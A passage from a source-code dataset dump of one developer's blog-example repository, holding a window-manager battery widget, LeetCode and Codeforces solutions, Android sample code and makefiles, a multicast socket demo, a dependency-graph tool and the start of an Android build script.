c.size_hints.program_position then\n awful.placement.no_overlap(c)\n awful.placement.no_offscreen(c)\n end\n end\nend)\n\nclient.add_signal(\"focus\", function(c) c.border_color = beautiful.border_focus end)\nclient.add_signal(\"unfocus\", function(c) c.border_color = beautiful.border_normal end)\n-- }}}\n\n-- save unfocus client and restore it when alt+tab is pressed\nprevious_client = nil\ncurrent_screen = nil\nclient.add_signal(\"unfocus\", function(c) previous_client = c end)\n\nfunction batteryInfo(adapter)\n local ffile_name = \"charge\"\n local fpath = \"/sys/class/power_supply/\"..adapter..\"/\" \n local fcur = io.open(fpath..ffile_name..\"_now\")\n if fcur == nil then\n ffile_name = \"energy\"\n end\n fcur = io.open(fpath..ffile_name..\"_now\")\n local fcap = io.open(fpath..ffile_name..\"_full\")\n local fsta = io.open(fpath..\"status\")\n\n local cur = fcur:read()\n local cap = fcap:read()\n local sta = fsta:read()\n local perc = math.floor(cur * 100 / cap)\n if perc > 100 then\n perc = 100\n end\n if sta:match(\"Charging\") then\n batterywidget.text = '<span color=\"green\"> ⚡' .. perc .. '% </span> '\n elseif sta:match(\"Discharging\") then\n if perc < 15 then\n batterywidget.text = '<span color=\"red\"> ⚡' .. perc .. '% </span> '\n elseif perc < 50 then\n batterywidget.text = '<span color=\"yellow\"> ⚡' .. perc .. '% </span> '\n else\n batterywidget.text = '<span> ⚡' .. perc .. '% </span> '\n end\n else\n batterywidget.text = '<span> ⚡' .. perc .. '% </span> '\n end\n fcur:close()\n fcap:close()\n fsta:close()\nend\n\nbatteryInfo(\"BAT0\")\nawful.hooks.timer.register(86, function() batteryInfo(\"BAT0\") end)\n" }, { "alpha_fraction": 0.5009709000587463, "alphanum_fraction": 0.5637540221214294, "avg_line_length": 30.53061294555664, "blob_id": "d8aae4167988780a4c824f9e69db652d48cb5fec", "content_id": "665f80002aa300252a1de90756e406200fe13cd6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1545, "license_type": "permissive", "max_line_length": 223, "num_lines": 49, "path": "/algorithm/leetcode/1_two_sum.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "/*\n *\n * http://leetcode.com/onlinejudge#question_1\n *\n * Two SumMar 14 '116343 / 20069\n *\n * Given an array of integers, find two numbers such that they add up to a specific target number.\n *\n * The function twoSum should return indices of the two numbers such that they add up to the target, where index1 must be less than index2. Please note that your returned answers (both index1 and index2) are not zero-based.\n *\n * You may assume that each input would have exactly one solution.\n *\n * Input: numbers={2, 7, 11, 15}, target=9\n * Output: index1=1, index2=2\n * \n */\n\n#include <iostream>\n#include <vector>\n\nusing namespace std;\n\nclass Solution {\n public:\n vector<int> twoSum(vector<int> &numbers, int target) {\n vector<int> result;\n for(int i = 0; i < numbers.size(); ++i) {\n for(int j = i+1; j < numbers.size(); ++j) {\n if(numbers[i] + numbers[j] == target) {\n result.push_back(i+1);\n result.push_back(j+1);\n break;\n }\n }\n }\n return result;\n }\n};\n\nint main(int argc, const char *argv[]) {\n Solution s;\n int array[] = //{2, 7, 11, 15};\n {678,227,764,37,956,982,118,212,177,597,519,968,866,121,771,343,561};//, 295\n vector<int> v(array, array+sizeof(array)/sizeof(array[0]));\n vector<int> r = s.twoSum(v, 295);\n for(vector<int>::const_iterator iter = r.begin(); iter != r.end(); ++iter)\n cout << *iter;\n return 0;\n}\n" }, { "alpha_fraction": 0.7119740843772888, "alphanum_fraction": 0.7173678278923035, "avg_line_length": 24.76388931274414, "blob_id": "1afb70b7f7fab66820f4a590ff93c9bf0dd9ef76", "content_id": "64a612618c33818256c8c8c4b6afcccd11b8a593", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1854, "license_type": "permissive", "max_line_length": 72, "num_lines": 72, "path": "/android/rpc-with-service/app2/src/com/rmd/app2/App2Main.java", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "package com.rmd.app2;\n\nimport android.app.Activity;\nimport android.content.ComponentName;\nimport android.content.Context;\nimport android.content.Intent;\nimport android.content.ServiceConnection;\nimport android.os.Bundle;\nimport android.os.IBinder;\nimport android.os.RemoteException;\nimport android.util.Log;\nimport android.view.View;\nimport android.widget.Button;\n\nimport com.rmd.ISvcController;\n\npublic class App2Main extends Activity {\n\tprivate ISvcController svc = null;\n\tServiceConnection con = null;\n\n\t/** Called when the activity is first created. */\n\t@Override\n\tpublic void onCreate(Bundle savedInstanceState) {\n\t\tsuper.onCreate(savedInstanceState);\n\t\tsetContentView(R.layout.main);\n\t\tLog.v(\"App2\", \"App2Main activity create.\");\n\n\t\tcon = new ServiceConnection() {\n\n\t\t\t@Override\n\t\t\tpublic void onServiceDisconnected(ComponentName name) {\n\t\t\t\tLog.v(\"App2\", \"App2Main Service Disconnected\");\n\t\t\t}\n\n\t\t\t@Override\n\t\t\tpublic void onServiceConnected(ComponentName name, IBinder service) {\n\t\t\t\tLog.v(\"App2\", \"App2Main Service Connected.\");\n\t\t\t\tLog.v(\"App2\", service.getClass().toString() + \"\\t hash code: \"\n\t\t\t\t\t\t+ service.hashCode());\n\t\t\t\tsvc = ISvcController.Stub.asInterface(service);\n\t\t\t}\n\t\t};\n\n\t\tButton btnStartSelf = (Button) findViewById(R.id.btnStartSelf);\n\t\tbtnStartSelf.setOnClickListener(new View.OnClickListener() {\n\t\t\tpublic void onClick(View v) {\n\t\t\t\tIntent i = new Intent(v.getContext(), App2Service.class);\n\n\t\t\t\tv.getContext().bindService(i, con, Context.BIND_AUTO_CREATE);\n\t\t\t}\n\t\t});\n\n\t\tButton btnCallRPC = (Button) findViewById(R.id.btnCallRPC);\n\t\tbtnCallRPC.setOnClickListener(new View.OnClickListener() {\n\t\t\tpublic void onClick(View v) {\n\t\t\t\ttry {\n\t\t\t\t\tsvc.foo(\"hello\");\n\t\t\t\t\tsvc.bar(\"raymond\");\n\t\t\t\t} catch (RemoteException ex) {\n\n\t\t\t\t}\n\t\t\t}\n\t\t});\n\n\t}\n\n\t@Override\n\tprotected void onStop() {\n\t\tunbindService(con);\n\t\tsuper.onStop();\n\t}\n}" }, { "alpha_fraction": 0.6702127456665039, "alphanum_fraction": 0.6843971610069275, "avg_line_length": 34.74647903442383, "blob_id": "a221e66318eefd20b7c98921ec310536d7909912", "content_id": "0cffe93405409c1d4a0b5e95127ee1e16cbe5877", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2558, "license_type": "permissive", "max_line_length": 945, "num_lines": 71, "path": "/algorithm/codeforces/2/2a.py", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nhttp://codeforces.com/problemset/problem/2/a\n\nA. Winner\ntime limit per test\n1 second\nmemory limit per test\n64 megabytes\ninput\nstandard input\noutput\nstandard output\n\nThe winner of the card game popular in Berland \"Berlogging\" is determined according to the following rules. If at the end of the game there is only one player with the maximum number of points, he is the winner. The situation becomes more difficult if the number of such players is more than one. During each round a player gains or loses a particular number of points. In the course of the game the number of points is registered in the line \"name score\", where name is a player's name, and score is the number of points gained in this round, which is an integer number. If score is negative, this means that the player has lost in the round. So, if two or more players have the maximum number of points (say, it equals to m) at the end of the game, than wins the one of them who scored at least m points first. Initially each player has 0 points. It's guaranteed that at the end of the game at least one player has a positive number of points.\nInput\n\nThe first line contains an integer number n (1  ≤  n  ≤  1000), n is the number of rounds played. Then follow n lines, containing the information about the rounds in \"name score\" format in chronological order, where name is a string of lower-case Latin letters with the length from 1 to 32, and score is an integer number between -1000 and 1000, inclusive.\nOutput\n\nPrint the name of the winner.\nSample test(s)\nInput\n\n3\nmike 3\nandrew 5\nmike 2\n\nOutput\n\nandrew\n\nInput\n\n3\nandrew 3\nandrew 2\nmike 5\n\nOutput\n\nandrew\n\"\"\"\n\n\ndef index_of_numer_no_smaller_than(array, num):\n for i in xrange(len(array)):\n if array[i] >= num:\n return i\n\nif __name__ == \"__main__\":\n score_board = {}\n rounds = int(raw_input())\n for i in xrange(rounds):\n (name, score) = tuple(raw_input().split())\n score = int(score)\n if not score_board.has_key(name):\n score_board[name]= [0 for j in xrange(i+1)]\n for (n, r) in score_board.items():\n if n == name:\n r.append(r[-1]+score)\n else:\n r.append(r[-1])\n\n m = max(r[-1] for r in score_board.itervalues())\n candidates = filter(lambda (n, r) : r[-1] == m, score_board.items())\n candidates = [(n, index_of_numer_no_smaller_than(r, m)) for (n, r) in candidates]\n (name, index) = min(candidates, key=lambda (n, i): i)\n print name\n" }, { "alpha_fraction": 0.7573033571243286, "alphanum_fraction": 0.7573033571243286, "avg_line_length": 20.25, "blob_id": "5822ecbc78b0f2064e5df6bce1c5bd54676523d6", "content_id": "590c4c19dffa7255cfbf26093cf4098807f42fcf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 445, "license_type": "permissive", "max_line_length": 63, "num_lines": 20, "path": "/android/drag/src/com/rmd/drag/TouchInterceptor.java", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "package com.rmd.drag;\r\n\r\nimport android.content.Context;\r\nimport android.util.AttributeSet;\r\nimport android.view.MotionEvent;\r\nimport android.widget.LinearLayout;\r\n\r\npublic class TouchInterceptor extends LinearLayout {\r\n\r\n\tpublic TouchInterceptor(Context context, AttributeSet attrs) {\r\n\t\tsuper(context, attrs);\r\n\t}\r\n\t\r\n\t@Override\r\n\tpublic boolean onInterceptTouchEvent(MotionEvent ev) {\r\n\t\t\r\n\t\treturn super.onInterceptTouchEvent(ev);\r\n\t}\r\n\r\n}\r\n" }, { "alpha_fraction": 0.7058823704719543, "alphanum_fraction": 0.729411780834198, "avg_line_length": 26.33333396911621, "blob_id": "0221ef61a3e4fbcb2cd9226a153935101aaaf3af", "content_id": "3489f8f8a94aa52ccbb757fa4660d389f5d1c867", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 170, "license_type": "permissive", "max_line_length": 43, "num_lines": 6, "path": "/algorithm/i2a_ex_15.4-5/Makefile", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "EXENAME = ex15_4_5\r\nM = dbg\r\n#UNITTESTEXENAME = entry_source_name\r\n#SRCEXTENSION = cpp \r\n#EXTERNALLIBS += additional_libs_to_include\r\ninclude\t$(MAKEFILE_ROOT)\\common.mk\r\n" }, { "alpha_fraction": 0.5596910119056702, "alphanum_fraction": 0.5835674405097961, "avg_line_length": 20.595237731933594, "blob_id": "c9e1f54601d15d1fef793ae3705dd43625660e23", "content_id": "b88a0504347231364ce7da5a9c38addaf53537d0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2848, "license_type": "permissive", "max_line_length": 72, "num_lines": 126, "path": "/networking/multicast.c", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": " #ifdef WIN32\r\n\r\n#include <stdio.h>\r\n#include <tchar.h>\r\n#include <winsock2.h>\r\n#include <ws2tcpip.h>\r\n#pragma comment(lib, \"Ws2_32.lib\")\r\n\r\n#elif defined WINCE\r\n\r\n#include <stdio.h>\r\n#include <tchar.h>\r\n#include <winsock2.h>\r\n#include <ws2tcpip.h>\r\n#pragma comment(lib, \"Ws2.lib\")\r\n\r\n#else\r\n\r\n#include <strings.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h> \r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <stdio.h>\r\n\r\n#endif\r\n\r\n#define PORT 6789\r\n#define GROUPIP \"239.0.1.2\"\r\n\r\n#if WINCE || WIN32 \r\nint wmain(int argc, _TCHAR* argv[])\r\n#else\r\nint main(int argc, char* argv[])\r\n#endif\r\n{\t\r\n\tstruct sockaddr_in addr;\r\n\tint addrlen, sock, count;\r\n\tstruct ip_mreq mreq;\r\n\tchar message[50];\r\n\r\n#if WINCE || WIN32 \r\n\tWSADATA wsaData;\r\n\tint iResult;\r\n\r\n\t// Initialize Winsock\r\n\tiResult = WSAStartup(MAKEWORD(2,2), &wsaData);\r\n\tif (iResult != 0) {\r\n\t\tprintf(\"WSAStartup failed: %d\\n\", iResult);\r\n\t\treturn 1;\r\n\t}\r\n#endif\r\n\r\n\tsock = socket(AF_INET, SOCK_DGRAM, 0);\r\n\tif (sock < 0) {\r\n\t\tprintf(\"failed to create socket\");\r\n\t\texit(1);\r\n\t}\r\n\r\n#if WINCE || WIN32 \r\n\tZeroMemory((char *)&addr, sizeof(addr));\r\n#else\r\n\tbzero((char *)&addr, sizeof(addr));\r\n#endif\r\n\taddr.sin_family = AF_INET;\r\n\taddr.sin_addr.s_addr = htonl(INADDR_ANY);\r\n\taddr.sin_port = htons(PORT);\r\n\taddrlen = sizeof(addr);\r\n\r\n\tif (argc > 1) {\r\n\t\t// sender\r\n\t\tstatic int i = 0;\r\n unsigned char ttl = 32;\r\n setsockopt(sock, IPPROTO_IP, IP_MULTICAST_TTL, &ttl,\r\n sizeof(unsigned char));\r\n\t\taddr.sin_addr.s_addr = inet_addr(GROUPIP);\r\n\t\twhile (1) {\r\n\t\t\tsprintf(message, \"counter is %d\", ++i);\r\n\t\t\tprintf(\"sending: %s\\n\", message);\r\n\t\t\tcount = sendto(sock, message, sizeof(message), 0,\r\n\t\t\t\t(struct sockaddr *) &addr, addrlen);\r\n\t\t\tif (count < 0) {\r\n\t\t\t\tprintf(\"failed to sendto\");\r\n\t\t\t\texit(1);\r\n\t\t\t}\r\n#if WINCE || WIN32 \r\n\t\t\tSleep(2000);\r\n#else\t\t\t\r\n sleep(2);\r\n#endif\r\n\t\t}\r\n\t} else {\r\n\t\t// receiver\r\n\t\tconst int on = 1;\r\n\t\tif (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR,\r\n\t\t\t(char*)&on, sizeof(on)) < 0) {\r\n\t\t\t\tprintf(\"failed to setsockopt SO_REUSEADDR\");\r\n\t\t\t\texit(1);\r\n\t\t}\r\n\t\tif (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) { \r\n\t\t\tprintf(\"failed to bind\");\r\n\t\t\texit(1);\r\n\t\t} \r\n\t\tmreq.imr_multiaddr.s_addr = inet_addr(GROUPIP); \r\n\t\tmreq.imr_interface.s_addr = htonl(INADDR_ANY); \r\n\t\tif (setsockopt(sock, IPPROTO_IP, IP_ADD_MEMBERSHIP,\r\n\t\t\t(char*)&mreq, sizeof(mreq)) < 0) {\r\n\t\t\t\tprintf(\"failed to setsockopt mreq\");\r\n\t\t\t\texit(1);\r\n\t\t} \r\n\t\twhile (1) {\r\n\t\t\tcount = recvfrom(sock, message, sizeof(message), 0, \r\n\t\t\t\t(struct sockaddr *) &addr, &addrlen);\r\n\t\t\tif (count < 0) {\r\n\t\t\t\tprintf(\"failed to recvfrom\");\r\n\t\t\t\texit(1);\r\n\t\t\t} else if (count == 0) {\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\tprintf(\"%s: message = \\\"%s\\\"\\n\", inet_ntoa(addr.sin_addr), message);\r\n\t\t}\r\n\t}\r\n\r\n\treturn 0;\r\n}\r\n" }, { "alpha_fraction": 0.747863233089447, "alphanum_fraction": 0.747863233089447, "avg_line_length": 45.79999923706055, "blob_id": "e76359acfbe9d15ec964e133e328723d5087ddc2", "content_id": "0d0923beff422e5e3d888687dcd3329c6b02d4a3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 234, "license_type": "permissive", "max_line_length": 59, "num_lines": 5, "path": "/settings/btsync/README.md", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "- copy [btsync](https://www.getsync.com/) to /usr/local/bin\n- copy start_btsync.sh to /usr/local/bin\n- copy btsync.service to /etc/systemd/system\n- run sudo systemctl enable btsync\n- access http://ip to visit btsync management portal\n" }, { "alpha_fraction": 0.6842105388641357, "alphanum_fraction": 0.6842105388641357, "avg_line_length": 16.538461685180664, "blob_id": "ed029e2ef6d0458722b83937027a094da6b5fb0e", "content_id": "4fd58c505b34dbb420e02ff4303770f1b512f56e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 228, "license_type": "permissive", "max_line_length": 31, "num_lines": 13, "path": "/android/read_system_property_with_jni/jni/Android.mk", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "LOCAL_PATH := $(call my-dir)\n\ninclude $(CLEAR_VARS)\nLOCAL_MODULE := libsysproperty\nLOCAL_C_INCLUDES := \n\nLOCAL_LDLIBS := -llog\nLOCAL_CFLAGS := -DDEBUG -g\n\nLOCAL_SRC_FILES := \\\n\tsys_property.c\n\ninclude $(BUILD_SHARED_LIBRARY)\n" }, { "alpha_fraction": 0.7132616639137268, "alphanum_fraction": 0.7284946441650391, "avg_line_length": 23.799999237060547, "blob_id": "0232b524439436ebf5609b0c1f5dd41a1c30edab", "content_id": "116b85ff04e2e5e1c223f319f17ece3d9f54ded9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1148, "license_type": "permissive", "max_line_length": 278, "num_lines": 45, "path": "/algorithm/codeforces/1/1a.py", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n\nhttp://codeforces.com/problemset/problem/1/A\n\nA. Theatre Square\ntime limit per test2 seconds\nmemory limit per test64 megabytes\ninputstandard input\noutputstandard output\nTheatre Square in the capital city of Berland has a rectangular shape with the size n × m meters. On the occasion of the city's anniversary, a decision was taken to pave the Square with square granite flagstones. Each flagstone is of the size a × a.\n\nWhat is the least number of flagstones needed to pave the Square? It's allowed to cover the surface larger than the Theatre Square, but the Square has to be covered. It's not allowed to break the flagstones. The sides of flagstones should be parallel to the sides of the Square.\n\nInput\nThe input contains three positive integer numbers in the first line: n,  m and a (1 ≤  n, m, a ≤ 109).\n\nOutput\nWrite the needed number of flagstones.\n\nSample test(s)\ninput\n6 6 4\noutput\n4\n\n\"\"\"\n\nimport math\n\ns = raw_input()\n\n(w,h,e)=s.split()\nw = int(w)\nh = int(h)\ne = int(e)\n\n#print w, h, e\n\nx = int(math.ceil(1.0*w/e))\ny = int(math.ceil(1.0*h/e))\n\nprint x*y\n" }, { "alpha_fraction": 0.5503783226013184, "alphanum_fraction": 0.5882118940353394, "avg_line_length": 31.399999618530273, "blob_id": "4ca6a2318eea9fdd5400447d071e2c7d0cd1a645", "content_id": "c82786332cac40aabbd698b2a30c8fd2e8b0c759", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5026, "license_type": "permissive", "max_line_length": 278, "num_lines": 155, "path": "/algorithm/codeforces/1/1c.py", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nhttp://codeforces.com/problemset/problem/1/C\n\nC. Ancient Berland Circus\ntime limit per test\n2 seconds\nmemory limit per test\n64 megabytes\ninput\nstandard input\noutput\nstandard output\n\nNowadays all circuses in Berland have a round arena with diameter 13 meters, but in the past things were different.\n\nIn Ancient Berland arenas in circuses were shaped as a regular (equiangular) polygon, the size and the number of angles could vary from one circus to another. In each corner of the arena there was a special pillar, and the rope strung between the pillars marked the arena edges.\n\nRecently the scientists from Berland have discovered the remains of the ancient circus arena. They found only three pillars, the others were destroyed by the time.\n\nYou are given the coordinates of these three pillars. Find out what is the smallest area that the arena could have.\nInput\n\nThe input file consists of three lines, each of them contains a pair of numbers –– coordinates of the pillar. Any coordinate doesn't exceed 1000 by absolute value, and is given with at most six digits after decimal point.\nOutput\n\nOutput the smallest possible area of the ancient arena. This number should be accurate to at least 6 digits after the decimal point. It's guaranteed that the number of angles in the optimal polygon is not larger than 100.\nSample test(s)\nInput\n\n0.000000 0.000000\n1.000000 1.000000\n0.000000 1.000000\n\nOutput\n\n1.00000000\n\n\"\"\"\n\nimport math\n\nclass Point(object):\n def __init__(self, x, y):\n self.x = x*1.0\n self.y = y*1.0\n\n def GetDistance(self, p2):\n dx = self.x - p2.x\n dy = self.y - p2.y\n return math.sqrt(dx*dx+dy*dy)\n\n def __str__(self):\n return '['+str(self.x)+','+str(self.y)+']'\n\nclass LineEquation(object):\n def __init__(self, p1, p2):\n self.type = 0 # 0: general form, 1: vertical line, 2: horizontal line\n self.p1 = p1\n self.p2 = p2\n if p1.x == p2.x:\n self.type = 1 # vertial\n self.x = p1.x\n elif p1.y == p2.y:\n self.type = 2 # horizontal\n self.y = p1.y\n else:\n self.type = 0\n self.slope = (p2.y-p1.y)/(p2.x-p1.x)\n self.intercept = p2.y-self.slope*p2.x\n #print \"%f %f %f %f %f %f\"%(p1.x, p1.y, p2.x, p2.y, self.slope, self.intercept)\n\n def GetMidperpendicular(self):\n result = None\n mid_x = (self.p1.x+self.p2.x)/2\n mid_y = (self.p1.y+self.p2.y)/2\n if self.type == 1:\n result = LineEquation(Point(0, mid_y), Point(1, mid_y))\n elif self.type == 2:\n result = LineEquation(Point(mid_x, 0), Point(mid_x, 1))\n else:\n slope = -1/self.slope\n result = LineEquation(Point(mid_x, mid_y), Point(mid_x-1, mid_y-slope))\n return result\n\n def GetCrossPoint(self, line):\n x = 0\n y = 0\n if (self.type == 1 and line.type == 1) \\\n or (self.type == 2 and line.type == 2) \\\n or (self.type == 0 and line.type == 0 and (self.slope - line.slope < 0.0000001)):\n return None\n if self.type == 1:\n x = self.x\n y = line.slope*x+line.intercept\n elif line.type == 1:\n return line.GetCrossPoint(self)\n elif self.type == 2:\n y = self.y\n x = (y-line.intercept)/line.slope\n elif line.type == 2:\n return line.GetCrossPoint(self)\n else:\n x = (line.intercept-self.intercept)/(self.slope-line.slope)\n y = line.slope*x+line.intercept\n return Point(x,y)\n\n def __str__(self):\n if self.type == 0:\n return 'y=' + str(self.slope) + '*x+' + str(self.intercept)\n elif self.type == 1:\n return 'x=' + str(self.x)\n else:\n return 'y=' + str(self.y)\n\ndef get_area_with_herons_formula(a, b, c):\n p = (a+b+c)/2\n s = math.sqrt(p*(p-a)*(p-b)*(p-c))\n return s\n\ndef get_radius(a, b, c, s):\n return a*b*c/(4*s)\n\ndef get_radian_of_triangle_with_low_of_cosines(a, b, c):\n r1 = math.acos((b**2+c**2-a**2)/(2*b*c))\n r2 = math.acos((c**2+a**2-b**2)/(2*c*a))\n r3 = math.acos((a**2+b**2-c**2)/(2*b*a))\n return r1, r2, r3\n\ndef get_gcd(a, b):\n if b < math.pi/100:\n return a\n return get_gcd(b, math.fmod(a, b))\n\nif __name__ == \"__main__\":\n\n coords = raw_input().split()\n p1 = Point(float(coords[0]), float(coords[1]))\n coords = raw_input().split()\n p2 = Point(float(coords[0]), float(coords[1]))\n coords = raw_input().split()\n p3 = Point(float(coords[0]), float(coords[1]))\n\n a = p1.GetDistance(p2)\n b = p2.GetDistance(p3)\n c = p3.GetDistance(p1)\n s = get_area_with_herons_formula(a, b, c)\n r = get_radius(a, b, c, s)\n r1, r2, r3 = get_radian_of_triangle_with_low_of_cosines(a, b, c)\n r = a/2.0/math.sin(r1)\n rgcd = 2.0*get_gcd(r1, get_gcd(r2, r3))\n result = r*r*math.sin(rgcd)/2*(2*math.pi/rgcd)\n print (\"%.6f\"%result)\n" }, { "alpha_fraction": 0.7191011309623718, "alphanum_fraction": 0.7191011309623718, "avg_line_length": 13.833333015441895, "blob_id": "ea0092c099f2c0a8bf7947a035b27db8bda60c29", "content_id": "3e8443c8434bef4323c9336df1a55e2be6414f77", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 178, "license_type": "permissive", "max_line_length": 29, "num_lines": 12, "path": "/android/native_read_property/jni/Android.mk", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "LOCAL_PATH:= $(call my-dir)\ninclude $(CLEAR_VARS)\n\nLOCAL_SRC_FILES:= \\\n\t\treadproperty.c\n\n\nLOCAL_PRELINK_MODULE := false\n\nLOCAL_MODULE:= readproperty\n\ninclude $(BUILD_EXECUTABLE)\n" }, { "alpha_fraction": 0.6061739921569824, "alphanum_fraction": 0.6083567142486572, "avg_line_length": 37.154762268066406, "blob_id": "2530277f1c46cffc0f770bea9768b0a6e3dfb9b3", "content_id": "3f21d3cc89585689cbdf5ddfce2437b491e16a0e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3207, "license_type": "permissive", "max_line_length": 139, "num_lines": 84, "path": "/tools/adepends.py", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__VERSION__ = '1.0.2'\n__author__ = '[email protected]'\n\nimport sys\nimport os\nfrom adepends_utils import androidmk_parser\nfrom optparse import OptionParser\n\nmodules = {}\ndef add_module_to_source(mod_name):\n# do nothing if the module is already in modules collection\n if mod_name in modules:\n pass\n else:\n mod = all_modules.find_module(mod_name)\n if mod:\n modules[mod_name] = mod\n for dep in mod.depends:\n add_module_to_source(dep)\n\ndef transfer_to_dot_valid(name):\n return name.replace(\"-\", \"_\").replace(\".\", \"_\").replace(\"+\", \"\")\n\ndef generate_dependency_graph(cmd_options):\n dot_file_path = cmd_options.output_file\n dot_file = open(dot_file_path, \"w\")\n dot_file.write(\"digraph {\\n\")\n for (mod_name, mod) in modules.items():\n if cmd_options.module and mod.name == cmd_options.module:\n#highlight target module\n dot_file.write(\"%s[style=bold,color=\\\"tomato\\\",label=\\\"%s\\l%s\\\"]\\n\"%(transfer_to_dot_valid(mod.name), mod.name, mod.directory))\n else:\n dot_file.write(\"%s[label=\\\"%s\\l%s\\\"]\\n\"%(transfer_to_dot_valid(mod.name), mod.name, mod.directory))\n for (mod_name, mod) in modules.items():\n for dep in mod.depends:\n dot_file.write(\"%s->%s\\n\"%(transfer_to_dot_valid(mod.name), transfer_to_dot_valid(dep)))\n dot_file.write(\"}\\n\")\n dot_file.close()\n\ndef parse_directory(dir_to_parse):\n mk_files = androidmk_parser.find_android_mk(dir_to_parse)\n all_modules = None\n for mk_file in mk_files:\n all_modules = androidmk_parser.parse_makefile(mk_file, all_modules)\n return all_modules\n\nif __name__ == \"__main__\":\n# parse command line options\n opt_parser = OptionParser(version = \"%prog \" + __VERSION__, \n description = \"command line tool for generating android dependency diagram\",\n usage = \"%prog [OPTION] [dir_to_parse]\")\n opt_parser.add_option(\"-o\", \"--output\", dest=\"output_file\", \n help=\"dot diagram file\")\n opt_parser.add_option(\"-m\", \"--module\", dest=\"module\",\n help=\"only generate dependency diagram for specified module\")\n opt_parser.add_option(\"-l\", \"--listmodule\", action=\"store_true\", default=False, \n help=\"only list modules defined in specified directory [default: %default]\")\n (cmdline_options, args) = opt_parser.parse_args()\n\n dir_to_parse = os.path.curdir\n if len(args) > 0:\n dir_to_parse = args[0]\n\n if not cmdline_options.listmodule:\n if not cmdline_options.output_file:\n print \"must specify -o/--output option\"\n sys.exit(-1)\n else:\n android_root = androidmk_parser.find_root()\n if android_root:\n dir_to_parse = android_root\n all_modules = parse_directory(dir_to_parse)\n if not cmdline_options.module:\n modules = all_modules.pool\n else:\n add_module_to_source(cmdline_options.module)\n generate_dependency_graph(cmdline_options)\n else:\n all_modules = parse_directory(dir_to_parse)\n for mod_name in all_modules.pool:\n print mod_name\n\n\n" }, { "alpha_fraction": 0.5074901580810547, "alphanum_fraction": 0.5230844616889954, "avg_line_length": 20.544973373413086, "blob_id": "f075a667d1c170b8a613ddfd824957d2d1b11a61", "content_id": "9725a11606f2db27587bbcad18343f6a2170b349", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 8144, "license_type": "permissive", "max_line_length": 94, "num_lines": 378, "path": "/tools/AndroidBuild.sh", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#!/bin/bash\n################################################################\n# file: AndroidBuild.sh\n# author: Richard Luo\n# date: 2010/04/18 11:15:55\n################################################################\n\n## set -ix\n## export TARGET_PRODUCT=cyanogen_crespo\n\n## export TARGET_PRODUCT=cyanogen_galaxytab\n\n# export ENABLE_FAST_BUILDING=yes\n# export TARGET_BUILD_VARIANT=eng\n\nif [ \"$TARGET_PRODUCT\" = \"\" ]\nthen\n export TARGET_PRODUCT=beagleboneblack\nfi\n\n# export TARGET_SIMULATOR=true\n# export TARGET_SIMULATOR_WITH_BINDER=true\n\nADB=${HOME}/projects/android_sdk/platform-tools/adb\n\nfunction Gettop\n{\n local TOPFILE=build/core/envsetup.mk\n if [ -n \"$TOP\" -a -f \"$TOP/$TOPFILE\" ] ; then\n echo $TOP\n else\n if [ -f $TOPFILE ] ; then\n echo $PWD\n else\n # We redirect cd to /dev/null in case it's aliased to\n # a command that prints something as a side-effect\n # (like pushd)\n local HERE=$PWD\n T=\n while [ \\( ! \\( -f $TOPFILE \\) \\) -a \\( $PWD != \"/\" \\) ]; do\n cd .. > /dev/null\n T=$PWD\n done\n cd $HERE > /dev/null\n if [ -f \"$T/$TOPFILE\" ]; then\n echo $T\n fi\n fi\n fi\n}\n\nTOP_DIR=$(Gettop)\n\nfunction Croot()\n{\n if [ \"$TOP_DIR\" ]; then\n cd $TOP_DIR\n else\n echo \"Couldn't locate the top of the tree. Try setting TOP.\"\n fi\n}\n\n# $1: path to the file that need to be installed into the system/bin\nfunction 